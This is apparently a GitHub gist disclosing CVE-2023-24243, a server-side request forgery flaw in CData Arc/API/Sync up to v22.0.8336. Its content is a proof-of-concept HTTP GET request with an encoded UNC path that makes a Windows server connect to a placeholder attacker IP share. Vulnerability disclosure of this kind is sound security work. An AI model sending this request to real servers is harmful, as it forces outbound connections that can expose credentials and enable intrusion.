Skip to content

Instantly share code, notes, and snippets.

View d3vc0r3's full-sized avatar

DEVCORE d3vc0r3

11 followers · 0 following
View GitHub Profile
@d3vc0r3
d3vc0r3 / CVE-2023-24243.md
Created June 15, 2023 15:12
Server-Side Request Forgery (SSRF) vulnerablity in CData Arc/API/Sync <= v22.0.8336

Description

Send http request like this to remote cdata server (windows):

GET /%255c%255c[ATTACKER IP]%255cC$%255cbb HTTP/1.1
Host: cdata.arc.ip